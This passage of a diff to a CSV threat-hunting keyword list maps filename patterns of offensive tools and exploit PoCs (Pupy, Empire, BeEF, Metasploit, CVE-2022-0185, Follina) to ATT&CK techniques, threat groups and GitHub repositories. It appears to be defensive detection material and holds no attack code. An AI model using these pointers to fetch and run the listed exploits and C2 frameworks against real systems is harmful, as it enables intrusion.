Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*exploit_fuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_kctf.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_oneline.md*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*exploit_suggester.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Exploitation Toolkit*","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*exploit-database-bin-sploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - 